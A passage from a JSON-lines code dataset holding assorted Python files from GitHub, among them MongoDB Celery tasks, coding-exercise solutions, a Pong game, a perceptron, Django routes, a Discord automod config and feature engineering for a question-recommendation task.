database,client = connection()\n try:\n database[\"conversations\"].insert_one(data)\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n client.close()\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Get All Conversation.')\ndef GetAllChat(self):\n database,client = connection()\n try:\n data=database[\"conversations\"].find({},{'_id': 0})\n data = json_util.dumps(data)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n return data\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='User:Get Conversation by session id')\ndef GetChatBySessionId(self,id):\n database,client = connection()\n try:\n filter = {'sessionID':id}\n filter_2 = {\"_id\": 0}\n data=database[\"conversations\"].find(filter,filter_2)\n data = json_util.dumps(data)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n return data\n\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='user:Update Message In A Conversation.')\ndef updateUser(self,data):\n database,client = connection()\n filter = { \"_id\": ObjectId(data[\"id\"]) }\n del data[\"id\"]\n newvalues = { \"$set\": data }\n try:\n database[\"conversations\"].update_one(filter,newvalues)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n\n\n@shared_task(bind=True,autoretry_for=(Exception,), retry_backoff=True, retry_kwargs={\"max_retries\": 5},\n name='user:Delete User Conversation.')\ndef deleteUser(self,data):\n database,client = connection()\n filter = { \"_id\": ObjectId(data[\"id\"]) }\n try:\n database[\"conversations\"].delete_one(filter)\n client.close()\n except Exception as e:\n print(\"Exception here :\",e)\n pass\n\n","repo_name":"gowthamr1999/Mongo_celery_fastapi","sub_path":"MongoDB_Celery/celery_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"944057354","text":"# class Solution:\n# # 扩展左右序号\n# def expandAroundCenter(self, s, left, right):\n# while left >= 0 and right < len(s) and s[left] == s[right]:\n# left -= 1\n# right += 1\n# return left + 1, right - 1\n#\n# def longestPalindrome(self, s):\n# self.start, self.end = 0, 0\n# for i in range(len(s)):\n# self.left1, self.right1 = self.expandAroundCenter(s, i, i)\n# self.left2, self.right2 = self.expandAroundCenter(s, i, i + 1)\n# if self.right1 - self.left1 > self.end - self.start:\n# self.start, self.end = self.left1, self.right1\n# if self.right2 - self.left2 > self.end - self.start:\n# self.start, self.end = self.left2, self.right2\n# return s[self.start: self.end + 1]\n\nclass Solution:\n def longestPalindrome(self, s):\n stack =[]\n res= 0\n for i in range(len(s)):\n if s[i] in stack:\n stack.append(s[i])\n list_temp = ''.join(stack)\n stack.reverse()\n list_temp1 = ''.join(stack)\n if list_temp1 == list_temp:\n res = max(res, len(stack))\n else:\n stack.reverse()\n else:\n stack.append(s[i])","repo_name":"liufeng112233/data-structure-and-algorithm","sub_path":"leetcode刷题/基础练习篇/5、最长回文子串.py","file_name":"5、最长回文子串.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"43794783571","text":"from __future__ import absolute_import, unicode_literals\n\nimport 
pytest\n\nfrom virtualenv.activation import BashActivator\nfrom virtualenv.info import IS_WIN\n\n\n@pytest.mark.skipif(IS_WIN, reason=\"Github Actions ships with WSL bash\")\ndef test_bash(raise_on_non_source_class, activation_tester):\n class Bash(raise_on_non_source_class):\n def __init__(self, session):\n super(Bash, self).__init__(\n BashActivator,\n session,\n \"bash\",\n \"activate\",\n \"sh\",\n \"You must source this script: $ source \",\n )\n\n activation_tester(Bash)\n","repo_name":"LGE-OSS/oss-review-toolkit-guide","sub_path":"use/result_files/scan/downloads/PyPI/unknown/virtualenv/20.2.1/virtualenv-20.2.1/tests/unit/activation/test_bash.py","file_name":"test_bash.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28863917126","text":"import pygame, sys\nfrom settings import *\nfrom sprites import *\n\n\ndef countdown():\n if ball_1.counter == 0:\n ball_1.counter = 3\n ball_1.restart()\n ball_1.crnt_time, ball_1.scored = 0, 0\n return\n\n count_surf = count_font.render(f\"{ball_1.counter}\", True, light_grey)\n count_rect = count_surf.get_rect(center=countdown_pos)\n screen.blit(count_surf, count_rect)\n \n\n# Game Loop\ndef main():\n running = True\n while running: \n # Handle Events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == timer:\n ball_1.counter -= 1\n\n # Render / Draw\n screen.fill(bg_color)\n pygame.draw.aaline(screen, grey3, scr_rect.midtop, scr_rect.midbottom)\n sprites.update()\n sprites.draw(screen)\n \n if ball_1.scored:\n countdown()\n\n\n # Update Display & Limit FPS\n pygame.display.flip()\n clock.tick(FPS)\n\n # Exit Game\n pygame.quit()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Blank0211/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38261450953","text":"import csv\r\nimport random\r\n\r\n\r\n# carrega os valores do dataset para serem manipulados\r\ndataset = []\r\n\r\nwith open('data.csv') as _file:\r\n data = csv.reader(_file, delimiter=',')\r\n for line in data:\r\n line = [float(elemento) for elemento in line]\r\n dataset.append(line)\r\n\r\n\r\ndef treino_teste_split(dataset, porcentagem):\r\n \"\"\"\r\n Separa e monta o conjunto principal\r\n em dois para testes e treinos\r\n \"\"\"\r\n percent = porcentagem*len(dataset) // 100\r\n data_treino = random.sample(dataset, percent)\r\n data_teste = [data for data in dataset if data not in data_treino]\r\n \r\n \r\n def montar(dataset):\r\n x, y = [], []\r\n for data in dataset:\r\n x.append(data[1:3])\r\n y.append(data[0])\r\n return x, y\r\n\r\n x_train, y_train = montar(data_treino)\r\n x_test, y_test = montar(data_teste)\r\n return x_train, y_train, x_test, y_test\r\n\r\nx_treino, y_treino, x_teste, y_teste = treino_teste_split(dataset, 80)\r\n\r\n\r\ndef sinal(u):\r\n \"\"\" Retorna a classe baseada no valor de u. \"\"\"\r\n return 1 if u >= 0 else -1\r\n\r\n\r\ndef ajuste(w, x, d, y):\r\n \"\"\" Define a taxa de aprendizagem e ajusta o valor do w. 
\"\"\"\r\n taxa_aprendiz = 0.001\r\n return w + taxa_aprendiz * (d - y) * x\r\n\r\n\r\ndef perceptron_fit(x, d):\r\n \"\"\" Executa o treinamento da rede \"\"\"\r\n epoca = 0\r\n w = [random.random() for i in range(3)]\r\n print(w)\r\n while True:\r\n erro = False\r\n for i in range(len(x)):\r\n u = sum([w[0]*-1, w[1]*x[i][0], w[2]*x[i][1]])\r\n y = sinal(u)\r\n if y != d[i]:\r\n w[0] = ajuste(w[0], -1, d[i], y)\r\n w[1] = ajuste(w[1], x[i][0], d[i], y)\r\n w[2] = ajuste(w[2], x[i][1], d[i], y)\r\n erro = True\r\n epoca += 1\r\n if erro is False or epoca == 1000:\r\n break\r\n print(epoca)\r\n return w\r\n\r\nw_fit = perceptron_fit(x_treino, y_treino)\r\nprint(w_fit)\r\n\r\n\r\ndef perceptron_predict(x, w_ajustado):\r\n y_predict = [] \r\n for i in range(len(x_teste)):\r\n predict = sum([w_ajustado[0]*-1, w_ajustado[1]*x_teste[i][0], w_ajustado[2]*x_teste[i][1]])\r\n y_predict.append(sinal(predict))\r\n return y_predict\r\n\r\ny_validado = perceptron_predict(x_teste, w_fit)\r\nprint(y_validado)\r\n\r\n\r\ndef acuracia(y_teste, y_validado):\r\n total = 0\r\n for i in range(len(y_teste)):\r\n if y_teste[i] == y_validado[i]:\r\n total += 1\r\n else:\r\n ...\r\n return total / len(y_validado)\r\n \r\naccuracy = acuracia(y_teste, y_validado)\r\nprint(accuracy)\r\n\r\n","repo_name":"misa9999/live-python","sub_path":"live35/neural_padrao.py","file_name":"neural_padrao.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"472193843","text":"from django.conf.urls import url\r\nfrom django.urls import include, path\r\nfrom django.contrib import admin\r\nfrom . import views\r\nfrom rest_framework import routers\r\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register(r'users', views.UserViewSet)\r\nrouter.register(r'groups', views.GroupViewSet)\r\nrouter.register(r'register',views.RegisterUserViewSet)\r\nrouter.register(r'country',views.CountryViewSet)\r\nrouter.register(r'state',views.StateViewSet)\r\nrouter.register(r'city',views.CityViewSet)\r\nrouter.register(r'properties',views.PropertyViewSet)\r\nrouter.register(r'propertytype',views.PropertyTypeViewSet)\r\nrouter.register(r'propertystatus',views.PropertyStatusViewSet)\nrouter.register(r'propertypurpose',views.PropertyPurposeViewSet)\nrouter.register(r'userprofile',views.UserProfileViewSet)\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n path('',views.index,name='index'),\r\n path('', include(router.urls)),\r\n path(r'api-token-auth/', obtain_jwt_token),\r\n path(r'api-token-refresh/', refresh_jwt_token),\r\n path(r'current_user/',views.current_user),\r\n path(r'set_user_status/',views.set_user_status),\r\n path(r'recommend/',views.recommend),\n path(r'predictSalePrice/',views.predictSalePrice),\n path(r'chartdata/',views.chartdata),\n path(r'countdata/', views.countdata),\n path(r'property/',views.PropertyFilterViewSet.as_view()),\n path(r'propertyforuser/',views.PropertyBasedOnUserViewSet.as_view()),\n #path(r'properties/', views.PropertyViewSet.as_view()),\n path(r'properties//', views.PropertyDataViewSet.as_view())\n #path(r'userprofile/',views.UserProfileViewSet.as_view()),\n #predictSalePrice\r\n]\r\n\r\n","repo_name":"Goldenstriker/SREPBackend","sub_path":"dataproviderapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} 
+{"seq_id":"41466042497","text":"from typing import Optional\n\n\nclass Solution:\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n curr = head\n while curr and curr.next:\n try:\n if curr.visited:\n return curr\n except AttributeError:\n curr.visited = True\n curr = curr.next\n return None\n","repo_name":"FallingStar624/GSDS3_Algo","sub_path":"FallingStar/LeetCode_W2/142_Linked_List_Cycle_II.py","file_name":"142_Linked_List_Cycle_II.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"25156400499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 19 19:15:07 2016\n\n@author: marialyu\n\"\"\"\n\nimport os\nfrom word2subwords import *\n\n\ndef my_run ():\n imdir = '/home/marialyu/dev/arabic_segmentation/data/'\n outdir = '/home/marialyu/dev/arabic_segmentation/results/'\n idxs = range(1, 7) + range(10, 18) + range(18, 24) + [27, 28]\n # Get image names\n imnames = []\n for f in os.listdir(imdir):\n full_f = os.path.join(imdir, f)\n if os.path.isfile(full_f) and f.startswith('word'):\n idx = int(re.search('\\d+', f).group())\n if idx in idxs:\n imnames.append(f)\n imnames.sort(key=natural_sort_key)\n\n # Divide string in subwords\n for imname in imnames:\n # Read image\n impath = os.path.join(imdir, imname)\n img = cv2.imread(impath)\n # Get contours of each subword\n subword_cnts = string2subwords(img, delete_diacritics=True)\n # Get list of subword images\n if 0:\n subwords = extract_subword_imgs(img.shape, subword_cnts)\n for subword in subwords:\n cv2.imshow('subword', subword)\n cv2.waitKey(150)\n # Draw all on one image\n if 1:\n color_subwords_img = draw_subwords(img.shape, subword_cnts)\n outpath = os.path.join(outdir, 'primary_' + imname)\n cv2.imwrite(outpath, color_subwords_img)\n# cv2.imshow('Subwords segmentation', color_subwords_img)\n# cv2.waitKey(0)\n # Get list of subword images\n if 0:\n vsubwords = draw_subwords_vertically(img.shape, subword_cnts)\n cv2.imshow('vsubwords', vsubwords)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n my_run()","repo_name":"maryribko/arabic_segmentation","sub_path":"py/my_run.py","file_name":"my_run.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"29135391848","text":"#insert file\nfname = input(\"Enter file:\")\n\n#open file\nif len(fname) < 1 : fname = \"mbox-short.txt\"\ndoc = open(fname)\n\n#read file\ndoc2 = doc.read()\n\n#print all content in upper case\nx = doc2.upper()\nprint (x)\n\t\n","repo_name":"tramontina/P4E_book_exercises","sub_path":"Chapter7-Ex1.py","file_name":"Chapter7-Ex1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23251003405","text":"from __future__ import annotations\n\nimport re\nfrom typing import TYPE_CHECKING, Callable, List, Optional, TypedDict, Union\n\nimport discord\nimport redis.asyncio as aioredis\nfrom discord.ext.commands import BucketType\n\nfrom lightning import AutoModCooldown, LightningBot\nfrom lightning.models import GuildAutoModRulePunishment\n\nif TYPE_CHECKING:\n class AutoModGuildConfig(TypedDict):\n guild_id: int\n default_ignores: List[int]\n warn_threshold: Optional[int]\n warn_punishment: Optional[str]\n rules: List[AutoModRulePayload]\n\n class AutoModRulePunishmentPayload(TypedDict):\n type: str\n duration: Optional[str]\n\n class 
AutoModRulePayload(TypedDict):\n guild_id: int\n type: str\n count: int\n seconds: int\n ignores: List[int]\n punishment: AutoModRulePunishmentPayload\n\n\nINVITE_REGEX = re.compile(r\"(?:https?://)?discord(?:app)?\\.(?:com/invite|gg)/[a-zA-Z0-9]+/?\")\nURL_REGEX = re.compile(r\"https?:\\/\\/.*?$\")\n\n\ndef invite_check(message: discord.Message):\n match = INVITE_REGEX.findall(message.content)\n return bool(match)\n\n\ndef url_check(message):\n match = URL_REGEX.findall(message.content)\n return bool(match)\n\n\nclass AutomodConfig:\n def __init__(self, bot: LightningBot, config: AutoModGuildConfig) -> None:\n self.guild_id: int = config[\"guild_id\"]\n self.default_ignores: set[int] = set(config.get(\"default_ignores\", []))\n self.warn_threshold = config.get('warn_threshold')\n self.warn_punishment = config.get('warn_punishment')\n\n self.bot = bot\n\n self.message_spam: Optional[SpamConfig] = None\n self.mass_mentions: Optional[SpamConfig] = None\n self.message_content_spam: Optional[SpamConfig] = None\n self.invite_spam: Optional[SpamConfig] = None\n self.url_spam: Optional[SpamConfig] = None\n # \"Basic Features\"\n self.auto_dehoist: bool = False\n self.auto_normalize: bool = False\n\n self.load_rules(config['rules'])\n\n def load_rules(self, rules):\n for rule in rules:\n if rule['type'] == \"mass-mentions\":\n self.mass_mentions = SpamConfig.from_model(rule, BucketType.member, self)\n if rule['type'] == \"message-spam\":\n self.message_spam = SpamConfig.from_model(rule, BucketType.member, self)\n if rule['type'] == \"message-content-spam\":\n self.message_content_spam = SpamConfig.from_model(rule,\n lambda m: (m.author.id, len(m.content)), self)\n if rule['type'] == \"invite-spam\":\n self.invite_spam = SpamConfig.from_model(rule, BucketType.member, self, check=invite_check)\n if rule['type'] == \"url-spam\":\n self.url_spam = SpamConfig.from_model(rule, BucketType.member, self, check=url_check)\n if rule['type'] == \"auto-dehoist\":\n self.auto_dehoist = True\n if rule['type'] == \"auto-normalize\":\n self.auto_normalize = True\n\n def is_ignored(self, message: discord.Message):\n if not self.default_ignores:\n return False\n\n return any(a in self.default_ignores for a in getattr(message.author, '_roles', [])) or message.author.id in self.default_ignores or message.channel.id in self.default_ignores # noqa\n\n\nclass BasicFeature:\n __slots__ = (\"punishment\")\n\n def __init__(self, data) -> None:\n self.punishment = GuildAutoModRulePunishment(data['punishment'])\n\n\nclass SpamConfig:\n __slots__ = (\"cooldown\", \"punishment\", \"check\")\n\n \"\"\"A class to make interacting with a message spam config easier...\"\"\"\n def __init__(self, rate: int, seconds: int, punishment_config: AutoModRulePunishmentPayload,\n bucket_type: Union[BucketType, Callable[[discord.Message], str]], key: str,\n redis_pool: aioredis.Redis, *,\n check: Optional[Callable[[discord.Message], bool]] = None) -> None:\n self.cooldown = AutoModCooldown(key, rate, seconds, redis_pool, bucket_type)\n self.punishment = GuildAutoModRulePunishment(punishment_config)\n\n if check and not callable(check):\n raise TypeError(\"check must be a callable\")\n\n self.check = check\n\n @classmethod\n def from_model(cls, record: AutoModRulePayload, bucket_type: Union[BucketType, Callable[[discord.Message], str]],\n config: AutomodConfig, *, check=None):\n return cls(record['count'], record['seconds'], record[\"punishment\"], bucket_type,\n f\"automod:{record['type']}:{config.guild_id}\", config.bot.redis_pool, 
check=check)\n\n async def update_bucket(self, message: discord.Message, increment: int = 1) -> bool:\n if self.check and self.check(message) is False:\n return False\n\n ratelimited = await self.cooldown.hit(message, incr_amount=increment)\n\n return bool(ratelimited)\n\n async def reset_bucket(self, message: discord.Message) -> None:\n # I wouldn't think there's a need for this but if you're using warn (for example), it'll double warn\n await self.cooldown.redis.delete(self.cooldown._key_maker(message))\n","repo_name":"lightning-bot/Lightning","sub_path":"lightning/cogs/automod/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"33600054793","text":"import math\ndef solution(answers):\n answer = []\n a1 = a2 = a3 = 0\n l1 = [1, 2, 3, 4, 5] * math.ceil(len(answers) / 5)\n l2 = [2, 1, 2, 3, 2, 4, 2, 5] * math.ceil(len(answers) / 8)\n l3 = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5] * math.ceil(len(answers) / 10)\n for i in range(len(answers)):\n if answers[i] == l1[i]:\n a1 += 1\n if answers[i] == l2[i]:\n a2 += 1\n if answers[i] == l3[i]:\n a3 += 1\n \n if max(a1, a2, a3) == a1:\n answer.append(1)\n if max(a1, a2, a3) == a2:\n answer.append(2)\n if max(a1, a2, a3) == a3:\n answer.append(3)\n return answer","repo_name":"hhh-one/PythonAlgorithm","sub_path":"Programmers/Level 1/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8604991813","text":"import math\r\nfor _ in range(int(input())):\r\n n, k = [int(x) for x in input().split()]\r\n l = [int(x) for x in input().split()]\r\n l.sort(reverse=True)\r\n move = math.ceil(n/2)\r\n move = n - move + 1\r\n ans = []\r\n for i in range(move-1, len(l), move):\r\n #print(i, l[i])\r\n ans.append(l[i])\r\n ans.sort(reverse=True)\r\n print(sum(ans[0:k]))\r\n","repo_name":"FazleRabbbiferdaus172/Codeforces_Atcoder_Lightoj_Spoj","sub_path":"Sum of Medians.py","file_name":"Sum of Medians.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24657268228","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: huangqiao\n@file: expert-last\n@time: 2019/12/16 16:02\n\"\"\"\n# %%\n# 特征分析\nimport warnings\n\nwarnings.filterwarnings('ignore')\nimport pandas as pd\nimport numpy as np\nimport gc\nimport pickle\n\n# -------------------------------------------------------train---------------------------#\nwith open('pkl/train.pkl', 'rb') as file:\n invite_info = pickle.load(file)\ninvite_info.head()\n# -------------------------------------------------------test---------------------------#\nwith open('pkl/test.pkl', 'rb') as file:\n test = pickle.load(file)\ntest.head()\n# -------------------------------------------------------single_word---------------------------#\nwith open('pkl/single_word.pkl', 'rb') as file:\n single_word = pickle.load(file)\nsingle_word.head()\n# -------------------------------------------------------word---------------------------#\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.head()\n# -------------------------------------------------------topic---------------------------#\nwith open('pkl/topic.pkl', 'rb') as file:\n topic = pickle.load(file)\ntopic.head()\n# -------------------------------------------------------member_info---------------------------#\n\nwith 
open('pkl/user.pkl', 'rb') as file:\n member_info = pickle.load(file)\nmember_info.head()\n# -------------------------------------------------------question_info---------------------------#\n\nwith open('pkl/question_info.pkl', 'rb') as file:\n question_info = pickle.load(file)\nquestion_info.head()\n# -------------------------------------------------------answer_info---------------------------#\n\nwith open('pkl/answer_info.pkl', 'rb') as file:\n answer_info = pickle.load(file)\nanswer_info.head()\n# -------------------------------------------------------member_info---------------------------#\n\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user_feat = pickle.load(file)\nuser_feat.head()\n# %%\n# 特征工程\nimport warnings\n\nwarnings.filterwarnings('ignore')\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport gc\nimport os\nimport time\nimport multiprocessing as mp\nimport logging\nfrom sklearn.preprocessing import LabelEncoder\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\ntic = time.time()\nSAVE_PATH = 'data/feats'\nif not os.path.exists(SAVE_PATH):\n print('create dir: %s' % SAVE_PATH)\n os.mkdir(SAVE_PATH)\n#####################################################################################################################################\n######################################################user###########################################################################\nwith open('pkl/user.pkl', 'rb') as file:\n user = pickle.load(file)\nlogging.info(\"user %s\", user.shape)\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\nwith open('pkl/topic.pkl', 'rb') as file:\n topicmap = pickle.load(file)\ntopicmap.shape\ntopic_vector_dict = dict(zip(np.array(topicmap['id']), np.array(topicmap['embed'])))\n\ntype(topic_vector_dict.keys())\n\n\n# 求话题向量平均值\ndef topic2v(x):\n try:\n tmp = topic_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + topic_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\nuser.head()\ntqdm.pandas(desc=\"topic2v...\")\nuser['follow_topic_vector'] = user['follow_topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\n\n\ndef topic_interest2v(x):\n if len(x) == 0:\n return np.zeros(64)\n else:\n tmp = np.zeros(64)\n for i in x:\n tmp = tmp + topic_vector_dict[i] * x[i]\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"topic_interest2v...\")\nuser['inter_topic_vector'] = user['inter_topic'].progress_apply(lambda x: topic_interest2v(x))\nprint('finished!')\nuser.head()\nuser.shape\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'topic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n user[col_name] = user['follow_topic_vector'].apply(lambda x: listi(x, i))\nfor i in range(64):\n col_name = 'topic_interestvector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n user[col_name] = user['inter_topic_vector'].apply(lambda x: listi(x, i))\nuser.head()\nuser.shape\nwith open('pkl/user_feat.pkl', 'wb') as file:\n pickle.dump(user, file)\n#######################################################添加\nPATH = 'data'\n\nuser = pd.read_csv(os.path.join(PATH, 'member_info_0926.txt'),\n names=['uid', 'gender', 'creat_keyword', 'level', 'hot', 'reg_type', 'reg_plat', 'freq', 'uf_b1',\n 'uf_b2',\n 'uf_b3', 'uf_b4', 'uf_b5', 'uf_c1', 'uf_c2', 'uf_c3', 'uf_c4', 'uf_c5', 'score',\n 'follow_topic',\n 'inter_topic'], sep='\\t')\nuser.head()\n\n\ndef parse_list_1(d):\n if d == '-1':\n return [0]\n return 
list(map(lambda x: int(x[1:]), str(d).split(',')))\n\n\nuser['creat_keyword'] = user['creat_keyword'].apply(parse_list_1)\nuser.head()\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.shape\nword_vector_dict = dict(zip(np.array(word['id']), np.array(word['embed'])))\n\n\ndef w2v(x):\n try:\n tmp = word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"w2v...\")\nuser['keyword_vector'] = user['creat_keyword'].progress_apply(lambda x: w2v(x))\nuser.head()\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'keyword_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"w2v...\")\n user[col_name] = user['keyword_vector'].apply(lambda x: listi(x, i))\nuser.shape\ncolumns = ['uid']\nfor i in range(64):\n columns.append('keyword_vector_{}'.format(i))\nkeyword_vector = user[columns]\nkeyword_vector.head()\nwith open('pkl/user_keyword_feat.pkl', 'wb') as file:\n pickle.dump(keyword_vector, file)\n######################################################################################################################################\n###############################################question############################################################################\n###################################################################加上topic的64维\nwith open('pkl/question_info.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.shape\nques.head()\ntqdm.pandas(desc=\"topic2v...\")\nques['topic_vector'] = ques['topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\n\n\ndef listi(x, i):\n return x[i]\n\n\nfor i in range(64):\n col_name = 'questopic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['topic_vector'].apply(lambda x: listi(x, i))\nques.head()\nques.shape\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, file)\n##############################################加上title_word切词的64维 title_t2\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.head()\nques.shape\nwith open('pkl/word.pkl', 'rb') as file:\n word = pickle.load(file)\nword.shape\nword_vector_dict = dict(zip(np.array(word['id']), np.array(word['embed'])))\n\n\ndef w2v(x):\n try:\n tmp = word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"w2v...\")\nques['title_w_vector'] = ques['title_t2'].progress_apply(lambda x: w2v(x))\nques.head()\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\ndef listi(x, i):\n return x[i]\n\n\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\nfor i in range(64):\n col_name = 'title_w_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['title_w_vector'].apply(lambda x: listi(x, i))\nques.head()\n###################################################################加上内容切词 desc_t2的64维\ntqdm.pandas(desc=\"w2v...\")\nques['desc_w_vector'] = ques['desc_t2'].progress_apply(lambda x: w2v(x))\nfor i in range(64):\n col_name = 'desc_w_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ques[col_name] = ques['desc_w_vector'].apply(lambda x: listi(x, i))\nques.head()\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, 
file)\n############################################################加上内容单字切词desc_t1的64维\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.head()\nwith open('pkl/single_word.pkl', 'rb') as file:\n single_word = pickle.load(file)\nsingle_word.shape\nsingle_word_vector_dict = dict(zip(np.array(single_word['id']), np.array(single_word['embed'])))\n\n\ndef sw2v(x):\n try:\n tmp = single_word_vector_dict[x[0]]\n except:\n tmp = np.zeros(64)\n for i in x[1:]:\n tmp = tmp + single_word_vector_dict[i]\n if len(tmp) == 0:\n return np.zeros(64)\n return (tmp / len(x))\n\n\ntqdm.pandas(desc=\"sw2v...\")\nques['desc_sw_vector'] = ques['desc_t1'].progress_apply(lambda x: sw2v(x))\nques.head()\n\n\ndef parse_str(d):\n return np.array(list(map(float, d.split())))\n\n\ndef listi(x, i):\n return x[i]\n\n\nfrom tqdm import tqdm, tqdm_notebook, _tqdm_notebook, tqdm_pandas\n\nfor i in range(64):\n col_name = 'desc_sw_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"sw2v...\")\n ques[col_name] = ques['desc_sw_vector'].apply(lambda x: listi(x, i))\nques.shape\n############################################################加上内容单字切词desc_t1的64维\ntqdm.pandas(desc=\"sw2v...\")\nques['title_sw_vector'] = ques['title_t1'].progress_apply(lambda x: sw2v(x))\nfor i in range(64):\n col_name = 'title_sw_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"sw2v...\")\n ques[col_name] = ques['title_sw_vector'].apply(lambda x: listi(x, i))\nques.shape\nwith open('pkl/ques_feat.pkl', 'wb') as file:\n pickle.dump(ques, file)\n######################################################################################################################################\n###############################################user_question_similary############################################################################\nwith open('pkl/ques_feat.pkl', 'rb') as file:\n ques = pickle.load(file)\nques.shape\n\ncolumns = ['qid']\n\ncolumns.append('topic_vector')\nques_topic = ques[columns]\nques_topic.head()\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user = pickle.load(file)\nuser.shape\ncolumns = ['uid']\n\ncolumns.append('inter_topic_vector')\nuser_topic = user[columns]\nuser_topic.head()\nuqid_sim = pd.merge(ques_topic, user_topic, on='qid')\nuqid_sim.head(100)\n#################################################################################################################################\n#################################################merge(ans,ques)的topic#####################################################################\n# 加载问题\nwith open('pkl/question_info.pkl', 'rb') as file:\n ques = pickle.load(file)\n\ncolumns = ['qid']\ncolumns.append('topic')\nques_topic = ques[columns]\nques_topic.head()\n# 加载回答\nwith open('pkl/answer_info.pkl', 'rb') as file:\n ans = pickle.load(file)\n\ncolumns = ['qid']\ncolumns.append('uid')\nans_topic = ans[columns]\nans_topic.head()\n# 将回答和问题信息按照qid进行合并\nans_topic_vector = pd.merge(ans_topic, ques_topic, on='qid')\ndel ques\n\n# ans对于文本信息只留了topic\nans_topic_vector.head()\nprint(ans_topic_vector.shape)\n\n\ndef parse_str(d):\n return np.array(list(map(float, 